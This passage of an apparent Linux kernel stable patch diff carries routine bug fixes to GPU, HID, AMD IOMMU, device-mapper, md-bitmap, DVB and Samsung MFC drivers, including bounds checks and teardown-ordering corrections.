++			i915_gem_evict_vm(vm, NULL, NULL);
+ 			mutex_unlock(&vm->mutex);
+ 		}
+ 	} while (1);
+diff --git a/drivers/gpu/drm/i915/selftests/i915_gem_evict.c b/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
+index 8c6517d29b8e0..37068542aafe7 100644
+--- a/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
++++ b/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
+@@ -344,7 +344,7 @@ static int igt_evict_vm(void *arg)
+ 
+ 	/* Everything is pinned, nothing should happen */
+ 	mutex_lock(&ggtt->vm.mutex);
+-	err = i915_gem_evict_vm(&ggtt->vm, NULL);
++	err = i915_gem_evict_vm(&ggtt->vm, NULL, NULL);
+ 	mutex_unlock(&ggtt->vm.mutex);
+ 	if (err) {
+ 		pr_err("i915_gem_evict_vm on a full GGTT returned err=%d]\n",
+@@ -356,7 +356,7 @@ static int igt_evict_vm(void *arg)
+ 
+ 	for_i915_gem_ww(&ww, err, false) {
+ 		mutex_lock(&ggtt->vm.mutex);
+-		err = i915_gem_evict_vm(&ggtt->vm, &ww);
++		err = i915_gem_evict_vm(&ggtt->vm, &ww, NULL);
+ 		mutex_unlock(&ggtt->vm.mutex);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/ingenic/ingenic-drm-drv.c b/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
+index ab0515d2c420a..4499a04f7c138 100644
+--- a/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
++++ b/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
+@@ -1629,7 +1629,11 @@ static int ingenic_drm_init(void)
+ 			return err;
+ 	}
+ 
+-	return platform_driver_register(&ingenic_drm_driver);
++	err = platform_driver_register(&ingenic_drm_driver);
++	if (IS_ENABLED(CONFIG_DRM_INGENIC_IPU) && err)
++		platform_driver_unregister(ingenic_ipu_driver_ptr);
++
++	return err;
+ }
+ module_init(ingenic_drm_init);
+ 
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200se.c b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+index be389ed91cbd8..bd6e573c9a1a3 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200se.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+@@ -284,7 +284,8 @@ static void mgag200_g200se_04_pixpllc_atomic_update(struct drm_crtc *crtc,
+ 	pixpllcp = pixpllc->p - 1;
+ 	pixpllcs = pixpllc->s;
+ 
+-	xpixpllcm = pixpllcm | ((pixpllcn & BIT(8)) >> 1);
++	// For G200SE A, BIT(7) should be set unconditionally.
++	xpixpllcm = BIT(7) | pixpllcm;
+ 	xpixpllcn = pixpllcn;
+ 	xpixpllcp = (pixpllcs << 3) | pixpllcp;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 214829c32ed87..7a2f262414ad4 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -308,7 +308,8 @@ void vmw_kms_cursor_snoop(struct vmw_surface *srf,
+ 	if (cmd->dma.guest.ptr.offset % PAGE_SIZE ||
+ 	    box->x != 0    || box->y != 0    || box->z != 0    ||
+ 	    box->srcx != 0 || box->srcy != 0 || box->srcz != 0 ||
+-	    box->d != 1    || box_count != 1) {
++	    box->d != 1    || box_count != 1 ||
++	    box->w > 64 || box->h > 64) {
+ 		/* TODO handle none page aligned offsets */
+ 		/* TODO handle more dst & src != 0 */
+ 		/* TODO handle more then one copy */
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index e27fb27a36bfa..82713ef3aaa64 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -412,6 +412,7 @@
+ #define USB_DEVICE_ID_HP_X2_10_COVER	0x0755
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15	0x2d05
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100	0x29CF
++#define I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV	0x2CF9
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index d728a94c642eb..3ee5a9fea20e6 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -380,6 +380,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN),
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 1a2d425bf5687..34029d1161073 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3402,18 +3402,24 @@ static int __init parse_amd_iommu_options(char *str)
+ static int __init parse_ivrs_ioapic(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	int ret, id, i;
++	int id, i;
+ 	u32 devid;
+ 
+-	ret = sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_ioapic%s\n", str);
+-			return 1;
+-		}
++	if (sscanf(str, "=%d@%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "=%d@%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5)
++		goto found;
++
++	if (sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5) {
++		pr_warn("ivrs_ioapic%s option format deprecated; use ivrs_ioapic=%d@%04x:%02x:%02x.%d instead\n",
++			str, id, seg, bus, dev, fn);
++		goto found;
+ 	}
+ 
++	pr_err("Invalid command line: ivrs_ioapic%s\n", str);
++	return 1;
++
++found:
+ 	if (early_ioapic_map_size == EARLY_MAP_SIZE) {
+ 		pr_err("Early IOAPIC map overflow - ignoring ivrs_ioapic%s\n",
+ 			str);
+@@ -3434,18 +3440,24 @@ static int __init parse_ivrs_ioapic(char *str)
+ static int __init parse_ivrs_hpet(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	int ret, id, i;
++	int id, i;
+ 	u32 devid;
+ 
+-	ret = sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_hpet%s\n", str);
+-			return 1;
+-		}
++	if (sscanf(str, "=%d@%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "=%d@%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5)
++		goto found;
++
++	if (sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5) {
++		pr_warn("ivrs_hpet%s option format deprecated; use ivrs_hpet=%d@%04x:%02x:%02x.%d instead\n",
++			str, id, seg, bus, dev, fn);
++		goto found;
+ 	}
+ 
++	pr_err("Invalid command line: ivrs_hpet%s\n", str);
++	return 1;
++
++found:
+ 	if (early_hpet_map_size == EARLY_MAP_SIZE) {
+ 		pr_err("Early HPET map overflow - ignoring ivrs_hpet%s\n",
+ 			str);
+@@ -3466,19 +3478,36 @@ static int __init parse_ivrs_hpet(char *str)
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	char *hid, *uid, *p;
++	char *hid, *uid, *p, *addr;
+ 	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
+-	int ret, i;
+-
+-	ret = sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_acpihid(%s)\n", str);
+-			return 1;
++	int i;
++
++	addr = strchr(str, '@');
++	if (!addr) {
++		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
++		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
++			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
++				str, acpiid, seg, bus, dev, fn);
++			goto found;
+ 		}
++		goto not_found;
+ 	}
+ 
++	/* We have the '@', make it the terminator to get just the acpiid */
++	*addr++ = 0;
++
++	if (sscanf(str, "=%s", acpiid) != 1)
++		goto not_found;
++
++	if (sscanf(addr, "%x:%x.%x", &bus, &dev, &fn) == 3 ||
++	    sscanf(addr, "%x:%x:%x.%x", &seg, &bus, &dev, &fn) == 4)
++		goto found;
++
++not_found:
++	pr_err("Invalid command line: ivrs_acpihid%s\n", str);
++	return 1;
++
++found:
+ 	p = acpiid;
+ 	hid = strsep(&p, ":");
+ 	uid = p;
+@@ -3488,6 +3517,13 @@ static int __init parse_ivrs_acpihid(char *str)
+ 		return 1;
+ 	}
+ 
++	/*
++	 * Ignore leading zeroes after ':', so e.g., AMDI0095:00
++	 * will match AMDI0095:0 in the second strcmp in acpi_dev_hid_uid_match
++	 */
++	while (*uid == '0' && *(uid + 1))
++		uid++;
++
+ 	i = early_acpihid_map_size++;
+ 	memcpy(early_acpihid_map[i].hid, hid, strlen(hid));
+ 	memcpy(early_acpihid_map[i].uid, uid, strlen(uid));
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index ab13b73802650..83a5975bcc729 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -551,11 +551,13 @@ static int __create_persistent_data_objects(struct dm_cache_metadata *cmd,
+ 	return r;
+ }
+ 
+-static void __destroy_persistent_data_objects(struct dm_cache_metadata *cmd)
++static void __destroy_persistent_data_objects(struct dm_cache_metadata *cmd,
++					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(cmd->metadata_sm);
+ 	dm_tm_destroy(cmd->tm);
+-	dm_block_manager_destroy(cmd->bm);
++	if (destroy_bm)
++		dm_block_manager_destroy(cmd->bm);
+ }
+ 
+ typedef unsigned long (*flags_mutator)(unsigned long);
+@@ -826,7 +828,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 		cmd2 = lookup(bdev);
+ 		if (cmd2) {
+ 			mutex_unlock(&table_lock);
+-			__destroy_persistent_data_objects(cmd);
++			__destroy_persistent_data_objects(cmd, true);
+ 			kfree(cmd);
+ 			return cmd2;
+ 		}
+@@ -874,7 +876,7 @@ void dm_cache_metadata_close(struct dm_cache_metadata *cmd)
+ 		mutex_unlock(&table_lock);
+ 
+ 		if (!cmd->fail_io)
+-			__destroy_persistent_data_objects(cmd);
++			__destroy_persistent_data_objects(cmd, true);
+ 		kfree(cmd);
+ 	}
+ }
+@@ -1807,14 +1809,52 @@ int dm_cache_metadata_needs_check(struct dm_cache_metadata *cmd, bool *result)
+ 
+ int dm_cache_metadata_abort(struct dm_cache_metadata *cmd)
+ {
+-	int r;
++	int r = -EINVAL;
++	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
++
++	/* fail_io is double-checked with cmd->root_lock held below */
++	if (unlikely(cmd->fail_io))
++		return r;
++
++	/*
++	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
++	 * cmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
++	 * shrinker associated with the block manager's bufio client vs cmd root_lock).
++	 * - must take shrinker_rwsem without holding cmd->root_lock
++	 */
++	new_bm = dm_block_manager_create(cmd->bdev, DM_CACHE_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
++					 CACHE_MAX_CONCURRENT_LOCKS);
+ 
+ 	WRITE_LOCK(cmd);
+-	__destroy_persistent_data_objects(cmd);
+-	r = __create_persistent_data_objects(cmd, false);
++	if (cmd->fail_io) {
++		WRITE_UNLOCK(cmd);
++		goto out;
++	}
++
++	__destroy_persistent_data_objects(cmd, false);
++	old_bm = cmd->bm;
++	if (IS_ERR(new_bm)) {
++		DMERR("could not create block manager during abort");
++		cmd->bm = NULL;
++		r = PTR_ERR(new_bm);
++		goto out_unlock;
++	}
++
++	cmd->bm = new_bm;
++	r = __open_or_format_metadata(cmd, false);
++	if (r) {
++		cmd->bm = NULL;
++		goto out_unlock;
++	}
++	new_bm = NULL;
++out_unlock:
+ 	if (r)
+ 		cmd->fail_io = true;
+ 	WRITE_UNLOCK(cmd);
++	dm_block_manager_destroy(old_bm);
++out:
++	if (new_bm && !IS_ERR(new_bm))
++		dm_block_manager_destroy(new_bm);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 54a8d5c9a44ea..5e92fac90b675 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -907,16 +907,16 @@ static void abort_transaction(struct cache *cache)
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return;
+ 
+-	if (dm_cache_metadata_set_needs_check(cache->cmd)) {
+-		DMERR("%s: failed to set 'needs_check' flag in metadata", dev_name);
+-		set_cache_mode(cache, CM_FAIL);
+-	}
+-
+ 	DMERR_LIMIT("%s: aborting current metadata transaction", dev_name);
+ 	if (dm_cache_metadata_abort(cache->cmd)) {
+ 		DMERR("%s: failed to abort metadata transaction", dev_name);
+ 		set_cache_mode(cache, CM_FAIL);
+ 	}
++
++	if (dm_cache_metadata_set_needs_check(cache->cmd)) {
++		DMERR("%s: failed to set 'needs_check' flag in metadata", dev_name);
++		set_cache_mode(cache, CM_FAIL);
++	}
+ }
+ 
+ static void metadata_operation_failed(struct cache *cache, const char *op, int r)
+@@ -1887,6 +1887,7 @@ static void destroy(struct cache *cache)
+ 	if (cache->prison)
+ 		dm_bio_prison_destroy_v2(cache->prison);
+ 
++	cancel_delayed_work_sync(&cache->waker);
+ 	if (cache->wq)
+ 		destroy_workqueue(cache->wq);
+ 
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 2f1cc66d26412..29e0b85eeaf09 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -1958,6 +1958,7 @@ static void clone_dtr(struct dm_target *ti)
+ 
+ 	mempool_exit(&clone->hydration_pool);
+ 	dm_kcopyd_client_destroy(clone->kcopyd_client);
++	cancel_delayed_work_sync(&clone->waker);
+ 	destroy_workqueue(clone->wq);
+ 	hash_table_exit(clone);
+ 	dm_clone_metadata_close(clone->cmd);
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index e97e9f97456d4..1388ee35571e0 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4558,6 +4558,8 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	BUG_ON(!RB_EMPTY_ROOT(&ic->in_progress));
+ 	BUG_ON(!list_empty(&ic->wait_list));
+ 
++	if (ic->mode == 'B')
++		cancel_delayed_work_sync(&ic->bitmap_flush_work);
+ 	if (ic->metadata_wq)
+ 		destroy_workqueue(ic->metadata_wq);
+ 	if (ic->wait_wq)
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index a27395c8621ff..6bcc4c4786d89 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -724,6 +724,15 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 		goto bad_cleanup_data_sm;
+ 	}
+ 
++	/*
++	 * When opening the pool metadata, setting the roots here is
++	 * redundant because they are set again in __begin_transaction().
++	 * But the dm pool abort path really needs the last transaction's
++	 * roots to avoid accessing a broken btree.
++	 */
++	pmd->root = le64_to_cpu(disk_super->data_mapping_root);
++	pmd->details_root = le64_to_cpu(disk_super->device_details_root);
++
+ 	__setup_btree_details(pmd);
+ 	dm_bm_unlock(sblock);
+ 
+@@ -776,13 +785,15 @@ static int __create_persistent_data_objects(struct dm_pool_metadata *pmd, bool f
+ 	return r;
+ }
+ 
+-static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd)
++static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd,
++					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(pmd->data_sm);
+ 	dm_sm_destroy(pmd->metadata_sm);
+ 	dm_tm_destroy(pmd->nb_tm);
+ 	dm_tm_destroy(pmd->tm);
+-	dm_block_manager_destroy(pmd->bm);
++	if (destroy_bm)
++		dm_block_manager_destroy(pmd->bm);
+ }
+ 
+ static int __begin_transaction(struct dm_pool_metadata *pmd)
+@@ -989,7 +1000,7 @@ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ 	}
+ 	pmd_write_unlock(pmd);
+ 	if (!pmd->fail_io)
+-		__destroy_persistent_data_objects(pmd);
++		__destroy_persistent_data_objects(pmd, true);
+ 
+ 	kfree(pmd);
+ 	return 0;
+@@ -1860,19 +1871,52 @@ static void __set_abort_with_changes_flags(struct dm_pool_metadata *pmd)
+ int dm_pool_abort_metadata(struct dm_pool_metadata *pmd)
+ {
+ 	int r = -EINVAL;
++	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
++
++	/* fail_io is double-checked with pmd->root_lock held below */
++	if (unlikely(pmd->fail_io))
++		return r;
++
++	/*
++	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
++	 * pmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
++	 * shrinker associated with the block manager's bufio client vs pmd root_lock).
++	 * - must take shrinker_rwsem without holding pmd->root_lock
++	 */
++	new_bm = dm_block_manager_create(pmd->bdev, THIN_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
++					 THIN_MAX_CONCURRENT_LOCKS);
+ 
+ 	pmd_write_lock(pmd);
+-	if (pmd->fail_io)
++	if (pmd->fail_io) {
++		pmd_write_unlock(pmd);
+ 		goto out;
++	}
+ 
+ 	__set_abort_with_changes_flags(pmd);
+-	__destroy_persistent_data_objects(pmd);
+-	r = __create_persistent_data_objects(pmd, false);
++	__destroy_persistent_data_objects(pmd, false);
++	old_bm = pmd->bm;
++	if (IS_ERR(new_bm)) {
++		DMERR("could not create block manager during abort");
++		pmd->bm = NULL;
++		r = PTR_ERR(new_bm);
++		goto out_unlock;
++	}
++
++	pmd->bm = new_bm;
++	r = __open_or_format_metadata(pmd, false);
++	if (r) {
++		pmd->bm = NULL;
++		goto out_unlock;
++	}
++	new_bm = NULL;
++out_unlock:
+ 	if (r)
+ 		pmd->fail_io = true;
+-
+-out:
+ 	pmd_write_unlock(pmd);
++	dm_block_manager_destroy(old_bm);
++out:
++	if (new_bm && !IS_ERR(new_bm))
++		dm_block_manager_destroy(new_bm);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e76c96c760a9b..196f82559ad6b 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2889,6 +2889,8 @@ static void __pool_destroy(struct pool *pool)
+ 	dm_bio_prison_destroy(pool->prison);
+ 	dm_kcopyd_client_destroy(pool->copier);
+ 
++	cancel_delayed_work_sync(&pool->waker);
++	cancel_delayed_work_sync(&pool->no_space_timeout);
+ 	if (pool->wq)
+ 		destroy_workqueue(pool->wq);
+ 
+@@ -3540,20 +3542,28 @@ static int pool_preresume(struct dm_target *ti)
+ 	 */
+ 	r = bind_control_target(pool, ti);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	r = maybe_resize_data_dev(ti, &need_commit1);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	r = maybe_resize_metadata_dev(ti, &need_commit2);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	if (need_commit1 || need_commit2)
+ 		(void) commit(pool);
++out:
++	/*
++	 * When a thin-pool is in PM_FAIL mode, it cannot be rebuilt
++	 * if a bio is in the deferred list. Therefore we need to
++	 * return 0 to allow pool_resume() to flush IO.
++	 */
++	if (r && get_pool_mode(pool) == PM_FAIL)
++		r = 0;
+ 
+-	return 0;
++	return r;
+ }
+ 
+ static void pool_suspend_active_thins(struct pool *pool)
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 63ece30114e53..e7cc6ba1b657f 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -486,7 +486,7 @@ void md_bitmap_print_sb(struct bitmap *bitmap)
+ 	sb = kmap_atomic(bitmap->storage.sb_page);
+ 	pr_debug("%s: bitmap file superblock:\n", bmname(bitmap));
+ 	pr_debug("         magic: %08x\n", le32_to_cpu(sb->magic));
+-	pr_debug("       version: %d\n", le32_to_cpu(sb->version));
++	pr_debug("       version: %u\n", le32_to_cpu(sb->version));
+ 	pr_debug("          uuid: %08x.%08x.%08x.%08x\n",
+ 		 le32_to_cpu(*(__le32 *)(sb->uuid+0)),
+ 		 le32_to_cpu(*(__le32 *)(sb->uuid+4)),
+@@ -497,11 +497,11 @@ void md_bitmap_print_sb(struct bitmap *bitmap)
+ 	pr_debug("events cleared: %llu\n",
+ 		 (unsigned long long) le64_to_cpu(sb->events_cleared));
+ 	pr_debug("         state: %08x\n", le32_to_cpu(sb->state));
+-	pr_debug("     chunksize: %d B\n", le32_to_cpu(sb->chunksize));
+-	pr_debug("  daemon sleep: %ds\n", le32_to_cpu(sb->daemon_sleep));
++	pr_debug("     chunksize: %u B\n", le32_to_cpu(sb->chunksize));
++	pr_debug("  daemon sleep: %us\n", le32_to_cpu(sb->daemon_sleep));
+ 	pr_debug("     sync size: %llu KB\n",
+ 		 (unsigned long long)le64_to_cpu(sb->sync_size)/2);
+-	pr_debug("max write behind: %d\n", le32_to_cpu(sb->write_behind));
++	pr_debug("max write behind: %u\n", le32_to_cpu(sb->write_behind));
+ 	kunmap_atomic(sb);
+ }
+ 
+@@ -2105,7 +2105,8 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 			bytes = DIV_ROUND_UP(chunks, 8);
+ 			if (!bitmap->mddev->bitmap_info.external)
+ 				bytes += sizeof(bitmap_super_t);
+-		} while (bytes > (space << 9));
++		} while (bytes > (space << 9) && (chunkshift + BITMAP_BLOCK_SHIFT) <
++			(BITS_PER_BYTE * sizeof(((bitmap_super_t *)0)->chunksize) - 1));
+ 	} else
+ 		chunkshift = ffz(~chunksize) - BITMAP_BLOCK_SHIFT;
+ 
+@@ -2150,7 +2151,7 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 	bitmap->counts.missing_pages = pages;
+ 	bitmap->counts.chunkshift = chunkshift;
+ 	bitmap->counts.chunks = chunks;
+-	bitmap->mddev->bitmap_info.chunksize = 1 << (chunkshift +
++	bitmap->mddev->bitmap_info.chunksize = 1UL << (chunkshift +
+ 						     BITMAP_BLOCK_SHIFT);
+ 
+ 	blocks = min(old_counts.chunks << old_counts.chunkshift,
+@@ -2176,8 +2177,8 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 				bitmap->counts.missing_pages = old_counts.pages;
+ 				bitmap->counts.chunkshift = old_counts.chunkshift;
+ 				bitmap->counts.chunks = old_counts.chunks;
+-				bitmap->mddev->bitmap_info.chunksize = 1 << (old_counts.chunkshift +
+-									     BITMAP_BLOCK_SHIFT);
++				bitmap->mddev->bitmap_info.chunksize =
++					1UL << (old_counts.chunkshift + BITMAP_BLOCK_SHIFT);
+ 				blocks = old_counts.chunks << old_counts.chunkshift;
+ 				pr_warn("Could not pre-allocate in-memory bitmap for cluster raid\n");
+ 				break;
+@@ -2537,6 +2538,9 @@ chunksize_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (csize < 512 ||
+ 	    !is_power_of_2(csize))
+ 		return -EINVAL;
++	if (BITS_PER_LONG > 32 && csize >= (1ULL << (BITS_PER_BYTE *
++		sizeof(((bitmap_super_t *)0)->chunksize))))
++		return -EOVERFLOW;
+ 	mddev->bitmap_info.chunksize = csize;
+ 	return len;
+ }
+diff --git a/drivers/media/dvb-core/dmxdev.c b/drivers/media/dvb-core/dmxdev.c
+index f6ee678107d37..9ce5f010de3f8 100644
+--- a/drivers/media/dvb-core/dmxdev.c
++++ b/drivers/media/dvb-core/dmxdev.c
+@@ -790,6 +790,11 @@ static int dvb_demux_open(struct inode *inode, struct file *file)
+ 	if (mutex_lock_interruptible(&dmxdev->mutex))
+ 		return -ERESTARTSYS;
+ 
++	if (dmxdev->exit) {
++		mutex_unlock(&dmxdev->mutex);
++		return -ENODEV;
++	}
++
+ 	for (i = 0; i < dmxdev->filternum; i++)
+ 		if (dmxdev->filter[i].state == DMXDEV_STATE_FREE)
+ 			break;
+@@ -1448,7 +1453,10 @@ EXPORT_SYMBOL(dvb_dmxdev_init);
+ 
+ void dvb_dmxdev_release(struct dmxdev *dmxdev)
+ {
++	mutex_lock(&dmxdev->mutex);
+ 	dmxdev->exit = 1;
++	mutex_unlock(&dmxdev->mutex);
++
+ 	if (dmxdev->dvbdev->users > 1) {
+ 		wait_event(dmxdev->dvbdev->wait_queue,
+ 				dmxdev->dvbdev->users == 1);
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 9934728734af9..a31d52cb6d62c 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -335,6 +335,7 @@ static int dvb_create_media_entity(struct dvb_device *dvbdev,
+ 				       GFP_KERNEL);
+ 		if (!dvbdev->pads) {
+ 			kfree(dvbdev->entity);
++			dvbdev->entity = NULL;
+ 			return -ENOMEM;
+ 		}
+ 	}
+diff --git a/drivers/media/dvb-frontends/stv0288.c b/drivers/media/dvb-frontends/stv0288.c
+index 3d54a0ec86afd..3ae1f3a2f1420 100644
+--- a/drivers/media/dvb-frontends/stv0288.c
++++ b/drivers/media/dvb-frontends/stv0288.c
+@@ -440,9 +440,8 @@ static int stv0288_set_frontend(struct dvb_frontend *fe)
+ 	struct stv0288_state *state = fe->demodulator_priv;
+ 	struct dtv_frontend_properties *c = &fe->dtv_property_cache;
+ 
+-	char tm;
+-	unsigned char tda[3];
+-	u8 reg, time_out = 0;
++	u8 tda[3], reg, time_out = 0;
++	s8 tm;
+ 
+ 	dprintk("%s : FE_SET_FRONTEND\n", __func__);
+ 
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
+index 72d70984e99a6..6d3c92045c05f 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
+@@ -468,8 +468,10 @@ void s5p_mfc_close_mfc_inst(struct s5p_mfc_dev *dev, struct s5p_mfc_ctx *ctx)
+ 	s5p_mfc_hw_call(dev->mfc_ops, try_run, dev);
+ 	/* Wait until instance is returned or timeout occurred */
+ 	if (s5p_mfc_wait_for_done_ctx(ctx,
+-				S5P_MFC_R2H_CMD_CLOSE_INSTANCE_RET, 0))
++				S5P_MFC_R2H_CMD_CLOSE_INSTANCE_RET, 0)) {
++		clear_work_bit_irqsave(ctx);
+ 		mfc_err("Err returning instance\n");
++	}
+ 
+ 	/* Free resources */
+ 	s5p_mfc_hw_call(dev->mfc_ops, release_codec_buffers, ctx);
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+index b65e506665af7..f62703cebb77c 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+@@ -1218,6 +1218,7 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 	unsigned long mb_y_addr, mb_c_addr;
+ 	int slice_type;
+ 	unsigned int strm_size;
++	bool src_ready;
+ 
+ 	slice_type = s5p_mfc_hw_call(dev->mfc_ops, get_enc_slice_type, dev);
+ 	strm_size = s5p_mfc_hw_call(dev->mfc_ops, get_enc_strm_size, dev);
+@@ -1257,7 +1258,8 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 			}
+ 		}
+ 	}
+-	if ((ctx->src_queue_cnt > 0) && (ctx->state == MFCINST_RUNNING)) {
++	if (ctx->src_queue_cnt > 0 && (ctx->state == MFCINST_RUNNING ||
